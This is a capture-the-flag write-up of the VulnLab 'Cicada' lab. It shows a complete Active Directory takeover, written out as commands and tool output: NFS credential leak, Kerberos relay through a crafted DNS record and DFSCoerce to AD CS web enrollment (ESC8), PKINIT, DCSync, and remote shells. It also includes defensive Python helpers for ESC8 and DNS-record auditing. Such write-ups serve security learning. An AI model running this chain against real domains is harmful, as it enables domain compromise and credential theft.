
VulnLab Cicada

Cicada

Recon

└─$ rustscan -g -r 1-65535 -a 10.10.97.220

10.10.97.220 -> [53,80,88,111,135,139,389,445,464,593,636,2049,3269,3268,3389,5985,9389]

└─$ nmap -sC -sV -p53,80,88,111,135,139,389,445,464,593,636,2049,3269,3268,3389,5985,9389 10.10.97.220
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 00:13 +06
Nmap scan report for 10.10.97.220
Host is up (0.097s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-15 18:12:26Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after:  2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after:  2025-09-13T10:42:50
2049/tcp open  nlockmgr      1-4 (RPC #100021)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after:  2025-09-13T10:42:50
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC-JPQ225.cicada.vl
| Not valid before: 2024-09-13T10:42:50
|_Not valid after:  2025-09-13T10:42:50
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC-JPQ225.cicada.vl
| Not valid before: 2025-02-14T18:10:41
|_Not valid after:  2025-08-16T18:10:41
|_ssl-date: 2025-02-15T18:13:51+00:00; -1m24s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC-JPQ225; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1m24s, deviation: 0s, median: -1m24s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-02-15T18:13:12
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.51 seconds

Root

The host runs NFS and exports the directory /profiles:

└─$ showmount -e cicada.vl
Export list for cicada.vl:
/profiles (everyone)

Mounting it reveals the user home directories:

└─$ sudo mount -t nfs cicada.vl:/profiles $PWD/share    
└─$ tree -L 2 share 
share
├── Administrator
│   ├── Documents
│   └── vacation.png
├── Daniel.Marshall
├── Debra.Wright
├── Jane.Carter
├── Jordan.Francis
├── Joyce.Andrews
├── Katie.Ward
├── Megan.Simpson
├── Richard.Gibbons
├── Rosie.Powell
│   ├── Documents
│   └── marketing.png
└── Shirley.West

14 directories, 2 files

Rosie.Powell's home holds marketing.png, and the picture contains her password:

└─$ sudo cp share/Rosie.Powell/marketing.png .
└─$ sudo eog marketing.png

Trying the credentials over SMB returns STATUS_NOT_SUPPORTED, which means NTLM authentication is disabled on the domain:

└─$ nxc smb cicada.vl -u 'rosie.powell' -p '<REDACTED>'
SMB         10.10.97.220    445    10.10.97.220     [*]  x64 (name:10.10.97.220) (domain:10.10.97.220) (signing:True) (SMBv1:False)
SMB         10.10.97.220    445    10.10.97.220     [-] 10.10.97.220\rosie.powell:<REDACTED> STATUS_NOT_SUPPORTED

Authenticating with Kerberos instead (-k) confirms the credentials are valid:

└─$ nxc smb dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k
SMB         dc-jpq225.cicada.vl 445    dc-jpq225        [*]  x64 (name:dc-jpq225) (domain:cicada.vl) (signing:True) (SMBv1:False)
SMB         dc-jpq225.cicada.vl 445    dc-jpq225        [+] cicada.vl\rosie.powell:<REDACTED>

AD CS is present; the IIS site on port 80 is probably its web enrollment endpoint:

└─$ nxc ldap dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -M adcs
LDAP        dc-jpq225.cicada.vl 389    DC-JPQ225        [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP        dc-jpq225.cicada.vl 389    DC-JPQ225        [+] cicada.vl\rosie.powell:<REDACTED> 
ADCS        dc-jpq225.cicada.vl 389    DC-JPQ225        [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS        dc-jpq225.cicada.vl 389    DC-JPQ225        Found PKI Enrollment Server: DC-JPQ225.cicada.vl
ADCS        dc-jpq225.cicada.vl 389    DC-JPQ225        Found CN: cicada-DC-JPQ225-CA

Request a TGT and use it with Certipy:

└─$ getTGT.py cicada.vl/rosie.powell:'<REDACTED>' -dc-ip dc-jpq225.cicada.vl                                           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in rosie.powell.ccache

Certipy reports the CA as vulnerable to ESC8 (web enrollment enabled and request disposition set to Issue):

└─$ KRB5CCNAME=rosie.powell.ccache certipy find -k -no-pass -debug -dc-ip dc-jpq225.cicada.vl -ns 10.10.97.220 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Domain retrieved from CCache: CICADA.VL
<SNIP>
Certificate Authorities
  0
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Certificate Subject                 : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
    Certificate Serial Number           : 491BDD500EA006974F23E975392B6C4E
    Certificate Validity Start          : 2025-02-15 18:06:51+00:00
    Certificate Validity End            : 2525-02-15 18:16:51+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CICADA.VL\Administrators
      Access Rights
        ManageCertificates              : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        ManageCa                        : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        Enroll                          : CICADA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates                   : [!] Could not find any certificate templates
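A small triage helper for this output format, added here as an example (it is not the write-up's or Certipy's code): it parses the CA block above and re-derives the ESC8 condition itself, noting that the RPC encryption setting shown does not protect the HTTP endpoint. The sample text is the page's own CA block, trimmed to the fields the check reads.

```python
"""Triage the 'Certificate Authorities' section of `certipy find -stdout`."""
import re
from typing import Dict, List

# Sample input: the CA block from the write-up, trimmed (constructed for this example).
SAMPLE_CA_OUTPUT = """\
Certificate Authorities
  0
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CICADA.VL\\Administrators
Certificate Templates                   : [!] Could not find any certificate templates
"""

CA_INDEX = re.compile(r"^  (\d+)$")              # "  0" opens a CA entry
FIELD = re.compile(r"^    (\S.*?)\s*:\s*(.*)$")  # 4-space indented "key : value"


def parse_cas(text: str) -> List[Dict[str, str]]:
    """Return one dict of top-level fields per CA; nested blocks (Permissions) are skipped."""
    cas: List[Dict[str, str]] = []
    in_section = False
    for line in text.splitlines():
        if line.startswith("Certificate Authorities"):
            in_section = True
            continue
        if in_section and not line.startswith(" "):
            break  # next top-level section, e.g. "Certificate Templates"
        if not in_section:
            continue
        if CA_INDEX.match(line):
            cas.append({})
        elif cas and (m := FIELD.match(line)):
            cas[-1][m.group(1)] = m.group(2)
    return cas


def esc8_findings(ca: Dict[str, str]) -> List[str]:
    """ESC8: HTTP web enrollment on a CA that issues without manager approval.
    'Enforce Encryption for Requests' only covers the RPC/DCOM enrollment
    interface (the ESC11 check), so it does not mitigate the web endpoint."""
    if ca.get("Web Enrollment") == "Enabled" and ca.get("Request Disposition") == "Issue":
        return [f"{ca.get('CA Name', '?')}: ESC8 exposure; disable HTTP enrollment "
                "or require HTTPS with Extended Protection (EPA) on /certsrv"]
    return []
```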

MachineAccountQuota is 10, so any domain user could create and join a computer account:

└─$ nxc ldap dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -M maq 
LDAP        dc-jpq225.cicada.vl 389    DC-JPQ225        [*] None (name:DC-JPQ225) (domain:cicada.vl)
LDAP        dc-jpq225.cicada.vl 389    DC-JPQ225        [+] cicada.vl\rosie.powell:<REDACTED> 
MAQ         dc-jpq225.cicada.vl 389    DC-JPQ225        [*] Getting the MachineAccountQuota
MAQ         dc-jpq225.cicada.vl 389    DC-JPQ225        MachineAccountQuota: 10

Several blog posts describe how to perform Kerberos relay here:

The Windows-based variant relies on the MachineAccountQuota, but the Linux-based variant used here does not need it. The only requirement is a DNS A record pointing at our box whose name has the special form described in those blogs. Since, by default, every authenticated user can create a DNS record that does not yet exist, we add one:

└─$ bloodyAD.py --host dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -d 'cicada.vl' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.4.147 
[+] dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
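The record just added is exactly what a defender should hunt for in AD-integrated DNS, alongside tightening the zone ACL so Authenticated Users cannot create records. As an added example (not from the write-up), this audits an exported record list for that pattern; the record list, the known DC set and the expected address ranges are constructed or assumed for cicada.vl.

```python
"""Audit ADIDNS A records for the Kerberos-relay naming pattern."""
import ipaddress
from typing import Iterable, List, Tuple

# Suffix of the record name used in the write-up: a marshalled target-information
# blob. It is stripped when the client builds the SPN, so the coerced client asks
# for a ticket to the real DC while connecting to whatever address the record holds.
MARSHAL_SUFFIX = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"

# Constructed sample of (name, address) A records as exported from the cicada.vl
# zone; the last entry mirrors the record added above.
SAMPLE_RECORDS = [
    ("dc-jpq225", "10.10.97.220"),
    ("ws01", "10.10.97.50"),
    ("dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA", "10.8.4.147"),
]
KNOWN_DCS = {"dc-jpq225"}                                 # assumed for cicada.vl
EXPECTED_NETS = [ipaddress.ip_network("10.10.97.0/24")]  # assumed for cicada.vl


def audit_records(records: Iterable[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (name, address, reasons) for every A record matching the relay pattern."""
    hits = []
    for name, addr in records:
        lname = name.lower()
        reasons = []
        # 1. No legitimate hostname carries a marshalled target-info suffix.
        if lname.endswith(MARSHAL_SUFFIX.lower()):
            reasons.append("marshalled target-info suffix")
        # 2. A name that begins with a DC's hostname but is not that DC.
        for dc in KNOWN_DCS:
            if lname != dc and lname.startswith(dc):
                reasons.append(f"impersonates {dc}")
        # 3. The record points outside the ranges where domain hosts live.
        if not any(ipaddress.ip_address(addr) in net for net in EXPECTED_NETS):
            reasons.append("address outside expected ranges")
        if reasons:
            hits.append((name, addr, "; ".join(reasons)))
    return hits
```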
  

For the coercion, use dfscoerce.py (other coercion methods should work as well):

└─$ KRB5CCNAME=rosie.powell.ccache python3 dfscoerce.py -k -no-pass 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc-jpq225.cicada.vl   
[-] Connecting to ncacn_np:dc-jpq225.cicada.vl[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot 
ServerName:                      'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA\x00' 
RootShare:                       'test\x00' 
ApiFlags:                        1 


DFSNM SessionError: code: 0x35 - ERROR_BAD_NETPATH - The network path was not found.

Make sure krbrelayx is updated to the latest version and is already running before triggering the coercion:

└─$ krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC-JPQ225$'
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server

[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.97.220
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.10.97.220
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] Skipping user DC-JPQ225$ since attack was already performed
[*] GOT CERTIFICATE! ID 20
[*] Writing PKCS#12 certificate to ./DC-JPQ225$.pfx
[*] Certificate successfully written to file

With the certificate in hand, request a TGT for the domain controller account via PKINIT:

└─$ gettgtpkinit.py -cert-pfx 'DC-JPQ225$.pfx' 'cicada.vl/DC-JPQ225$' DC-JPQ225.ccache
2025-02-16 02:25:54,246 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-16 02:25:54,540 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-16 02:26:05,870 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):                                                                                                                                                                        
2025-02-16 02:26:05,870 minikerberos INFO     c326fc1b13c7afc395e785808254612a8948420d28e3f1b481e8ed7a8b6c60d9                                                                                                                              
INFO:minikerberos:c326fc1b13c7afc395e785808254612a8948420d28e3f1b481e8ed7a8b6c60d9                                                                                                                                                          
2025-02-16 02:26:05,872 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

DCSync using the ticket:

└─$ KRB5CCNAME=DC-JPQ225.ccache secretsdump.py -k -no-pass DC-JPQ225.cicada.vl 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>

Configure krb5.conf so that evil-winrm can authenticate with Kerberos:

└─$ cat krb5.conf       
[libdefaults]
    default_realm = CICADA.VL
    dns_lookup_realm = true
    dns_lookup_kdc = true

[realms]
    CICADA.VL = {
        kdc = dc-jpq225.cicada.vl
        admin_server = dc-jpq225.cicada.vl
        default_domain = dc-jpq225.cicada.vl
    }

[domain_realm]
    cicada.vl = CICADA.VL
    .cicada.vl = CICADA.VL

Then set the environment variables and connect:

└─$ KRB5_CONFIG=krb5.conf KRB5CCNAME=administrator@DC-JPQ225.cicada.vl.ccache evil-winrm -i DC-JPQ225.cicada.vl -u administrator -r CICADA.VL 
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Warning: User is not needed for Kerberos auth. Ticket will be used
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS Microsoft.PowerShell.Core\FileSystem::\\dc-jpq225\profiles$\Administrator\Documents> 

Or simply use wmiexec.py:

└─$ KRB5CCNAME=administrator@DC-JPQ225.cicada.vl.ccache wmiexec.py -k -no-pass DC-JPQ225.cicada.vl  
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>type \users\administrator\desktop\root.txt

https://api.vulnlab.com/api/v1/share?id=56b13afc-3db2-468d-9536-dd298b39aab4

This post is licensed under CC BY 4.0 by the author.